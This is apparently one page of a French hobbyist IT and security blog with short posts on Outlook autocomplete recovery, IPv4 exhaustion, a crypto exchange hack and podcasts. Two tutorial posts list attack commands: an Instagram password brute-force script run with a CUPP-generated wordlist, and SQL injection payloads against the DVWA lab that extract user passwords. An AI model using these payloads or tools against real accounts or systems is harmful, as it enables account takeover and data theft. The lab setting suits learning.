Page 2 of 11

Restauration de base de données

Tutoriel en français expliquant comment restaurer une base de données MariaDB à partie d’un Raspberry qui ne démarre plus.

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: Cascade
Auteur: Kubbi
Source: http://www.kubbimusic.com/
Licence: https://creativecommons.org/licenses/by-sa/3.0/deed.fr
Téléchargement (8MB): https://www.auboutdufil.com/index.php?id=485

Regénérer le fichier NK2 Autocomplete d’Outlook à partir des Éléments envoyés ou de la Boite de réception

Quand un disque lâche et qu’on a pas de sauvegarde, on perd tout !

Et tant pis pour celui à qui ça arrive, on répète tout le temps qu’il faut faire des sauvegardes donc celui qui n’en a pas, bien fait ! 😛

Bon, sinon, quand on arrive à l’étape de la réinstallation du Outlook, on réinstalle la boîte, avec un peu de chance c’était pas en POP3 donc on arrive à récupérer les mails, et là, le client te dit :

“Bah j’ai pu mes contacts”

Ouais, parce qu’en fait le client parle pas des contacts. Il parle du cache d’autocomplétion lorsqu’on saisie dans le champ “À”.

Mais comme il sait pas comment ça s’appelle, pour lui c’est les contacts…

Bref, voyons comment reconstruire ce petit bidule !


Etape 1 : Exporter les contacts des mails reçus dans un fichier CSV

C’est pas très sorcier, dans Outlook, accéder à l’onglet “Fichier” puis sélectionner “Importer/Exporter”

Sélectionner “Exporter des données vers un fichier” et sélectionner le format “Valeurs séparées par une virgule”.

Spécifier l’emplacement du fichier au format CSV puis cliquer sur “Champs personnalisés” pour exporter uniquement les adresses du champ “De :”

Ensuite, patienter pendant l’exportation.

Au besoin, naviguer vers cette vidéo afin de rendre plus agréable ce moment : https://www.youtube.com/watch?v=JOfqoq3_mEE


Etape 2 : Supprimer les doublons avec Excel

Ouvrir le fichier avec Excel et sélectionner l’option “Supprimer les doublons” dans l’onglet “Données”

Sélectionner uniquement la colonne A.

Chez moi ça a fait pas mal de tri 🙂


Etape 3 : Modification des virgules

Ouvrir le fichier CSV avec un éditeur de texte. Un vrai éditeur, genre pas notepad quoi ^^

(Pour ma part j’utilise Sublim text, mais ça fonctionne aussi avec Notepad++, Atom… etc)

Supprimer la première ligne “De: (Adresse)

Faire un Rechercher et Remplacer avec la combinaison CTRL+H.

Remplacer tous les retours à la ligne (symbole “\n”) par un point virgule.


Etape 4 : Réimportation dans Outlook et reconstruction du cache

Sélectionner tout le contenu du fichier CSV depuis l’éditeur de texte et le copier-coller dans le champ “À…” d’un nouveau message Outlook.

Appuyer sur tabulation ou cliquer sur un autre champ de saisie pour libérer le focus. L’ensemble des adresses collées deviennent soulignées, ce qui indique qu’elles ont étés intégrées au cache d’autocomplétion.

Si on ferme le message actuel et qu’on en créer un nouveau, l’autocomplétion refonctionne à nouveau pour le champ “À…”


Voilà !

Pour info, le fichier d’autocomplétion est au format NK2 et se trouve dans %AppData%\Microsoft\Outlook\

NirSoft a mis au point 2 logiciels sympathiques pour les éditer et visualiser :

nk2 edit :

https://www.nirsoft.net/utils/outlook_nk2_edit.html

et nk2 view :

https://www.nirsoft.net/utils/outlook_nk2_autocomplete.html

Profilage et génération de wordlist avec CUPP

Tutoriel en français détaillant le fonctionnement du framework CUPP qui permet de générer des dictionnaires de mots de passe personnalisé.

Ce tutoriel est à but instructif uniquement.
Je ne vous incite en aucun cas à prendre le contrôle d’un système qui ne vous appartient pas.

Le lien vers mon blog :
https://lestutosdeprocessus.fr

Le repo github de CUPP :
https://github.com/Mebus/cupp

Le repo github de Instagram :
https://github.com/Pure-L0G1C/Instagram

Les commandes de la vidéos :
pip install -r requirements.txt
python instagram.py -h
python instagram.py username wordlist

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: La Ballade De Greg Blount Remixx
Auteur: Throw Panda Bat
Source: http://www.myspace.com/throwpandabat
Licence: http://creativecommons.org/licenses/by-nc-sa/3.0/
Téléchargement (6MB): https://www.auboutdufil.com/index.php?id=371

Bientôt la fin d’IPv4 ?

En 2018, tout le monde se disait que ça n’arriverait qu’en 2021…

Aujourd’hui on se rend compte que ça va nous tomber dessus plutôt en Mai 2020…

L’ARCEP, l’organisme chargée de la régulation de l’affectation des IP (entre autres) vient de sortir un nouveau rapport qui prévoit la pénurie des adresses IPv4 en Mai 2020.

Alors bien sûr, plutôt que d’essayer de passer progressivement sous IPv6, on fait l’autruche et on attends une directive européenne qui nous y obligera !

Et puis, même si les ressources s’épuisent, ça n’empêche pas de vendre un sous-réseau public en /8 à Amazon 🙂

Source : https://www.whois.com/whois/44.192.0.0


Bref, là où ça craint c’est que chacun construit des alternatives bouche-trou de son côté…

Free songe (et le fait déjà) à mutualiser certains clients sur une même adresse public et trifouiller des redirections de ports dans tous les sens pour que ça soit transparent pour le client final.

Chez FirstHeberg, où ce blog est hébergé, Jérémy Martin, le directeur technique, indique qu’actuellement une adresse publique est allouée à chaque site, chaque serveur loué.

Mais lorsque la pénurie sera avérée, ils devraient fournir uniquement des IPv6 et proposer une option (payante évidemment) supplémentaire pour avoir une IPv4.

Le problème, c’est que tous les clients ou équipements qui ne disposent pas d’une adresse IPv6 ne pourront pas accéder à ces derniers.

On arrivera donc à un Internet scindé en deux parties.

Et quand on voit que certains aéroport tournent encore sous Windows 3.1 (C’était à Orly) on se dit qu’on est pas prêt d’avoir de l’IPv6 partout…

L’Arcep va fournir un rapport hebdomadaire pour suivre l’évolution (où plutôt la diminution) des adresses IPv4 ici : https://www.arcep.fr/la-regulation/grands-dossiers-internet-et-numerique/lipv6/suivi-epuisement-adresses-ipv4.html

L’interview de Jérémy Martin figure également à cette adresse.

Le lien du site de l’ARCEP : https://www.arcep.fr

Apprendre le C facilement

En parallèle des autres projets, j’essaye de me mettre au C. Et quand on a jamais mis les mains là dedans, c’est compliqué !

J’ai quelques notions de Java grâce à mes études mais je n’ai jamais appris à développer en C

Et je suis tombé sur un petite pépite, la chaîne Youtube FormationVidéo de Jason Champagne :

https://www.youtube.com/channel/UCS2e0hEJMhwd6bNscS60xTg

Les tutoriels sont bien expliqués, le son est clair, c’est plaisant à regarder et super instructif

Et en plus il vient de Reims, c’est donc forcément un gars bien !

Bref, la chaine comporte plusieurs autres langages également disponibles (C++, Java, PHP..)

Le lien du site de Jason :

https://jasonchampagne.fr/

Les différentes playlists disponibles :

https://www.youtube.com/channel/UCS2e0hEJMhwd6bNscS60xTg/playlists

Sale temps pour les mineurs !

Dans la nuit de Jeudi à Vendredi, l’équivalent de 29 millions d’euros ont été piratés sur la plateforme d’échanges de cryptomonnaies japonaise BitPoint Japan.

Il s’agirait d’une erreur dans le système de transaction des fonds sortants de l’entreprise.

Aucune information supplémentaire n’a été fournie et les analyses se poursuivent…

Les 2 tiers du montant dérobé appartenaient à des clients et le reste à la plateforme. Seuls les hot wallet ont été impactés.

Les devises impactées sont du Bitcoin, du Bitcoin cash, de l’Ethereum, du Litecoin et du Ripple.

L’action du groupe à perdu 18,6 % en bourse à la suite de cette annonce.

Car BitPoint Japan n’est qu’une filiale d’un groupement plus important spécialisé dans la mise au point de logiciels de cryptage et dans le développement de l’industrie automobile, le tout représentant environ 41 millions de dollars en bourse.

Injection SQL sur DVWA

Tutoriel en français expliquant le principe de l’injection SQL sur le framework DVWA.

Ce tutoriel a été réalisé sur une application prévue pour des tests d’intrusion.

Je ne vous encourage en aucun cas à reproduire ce type d’attaque sur un système qui ne vous appartient pas.

Le lien de DVWA :

http://www.dvwa.co.uk/

Les commandes utilisées :
1′ or 1=1#
1′ or 1=1 union select table_name from information_schema.tables#
1′ or 1=1 union select null, table_name from information_schema.tables#
1′ or 1=1 union select table_name, column_name from information_schema.columns#
1′ or 1=1 union select user, password from users#

Musique d’intro :
Titre: Mainstream Pop
Auteur: Bricks
Source: http://www.myspace.com/bricksof78
Licence: http://creativecommons.org/licenses/by-nc-nd/2.0/
Téléchargement (4MB): https://www.auboutdufil.com/index.php?id=312

La musique de fond :
Titre: Leaf
Auteur: KV
Source: https://soundcloud.com/kvmusicprod
Licence: https://www.creativecommons.org/licenses/by/4.0/
Téléchargement (5MB): https://www.auboutdufil.com/index.php?id=509

NoLimitSecu : Le meilleur podcast

Logo de NoLimitSecu

Tous les jours j’ai environ 40 minutes de route depuis mon domicile jusqu’à mon travail.

Au début, j’écoutais la radio, puis je me suis mis à écouter des conférences Linux sur Youtube (celle-ci est top : https://www.youtube.com/watch?v=PlsSS16k8Vk) mais je suis vite arrivé au bout de ce que je cherchais…

Et c’est là que j’ai découvert le fabuleux monde des podcasts !

Il en existe beaucoup, mais mon préféré est celui de NoLimitSécu.

Les mecs sont des pros, qui font intervenir des pros, dans une émission déstinée à des pros ! #LaSécuPourLesGrosBarbus

Bref, c’est super intéressant et plaisant à écouter.

Il fallait donc que je vous en parle 🙂

Voici le lien pour vous abonner :

https://www.nolimitsecu.fr

Leur seul défaut c’est de pas en publier plus souvent !


Sinon, j’écoute également ceux là :

Niptech : https://niptech.com

Les Technos : https://lestechnos.be

Si vous en avez d’autres, je suis preneur !

Toc toc ? Y-a-t’il un Apache vulnérable ici ?

Ça commence déjà !

Le site est en ligne depuis hier et on a déjà un petit malin qui fait passer du nmap et de l’uniscan par là 🙂

Capture d’écran du fichier d’accès d’Apache montrant les requêtes Nmap
Capture d’écran du fichier d’accès d’Apache montrant les requêtes Uniscan

En revanche, il a oublié de mettre en marche son VPN on dirait…

Attention mon ami, on te voit !

Le grand déménagement

Si vous lisez ces lignes, c’est que tout s’est bien passé 🙂

Youtube a choisi de modifier ses conditions générales et désormais les tutos risquent de ne plus pouvoir être hébergés sur cette plateforme.

J’ai donc choisi la voie de l’indépendance !

Le site est encore en cours de construction mais c’est pour bientôt !

L’ensemble des tutos seront donc disponibles sur ce serveur, avec un doublon sur la chaine Youtube (jusqu’à sa fermeture).

Encore un peu de patience 😉

Proc

#TeamKali

« Older posts Newer posts »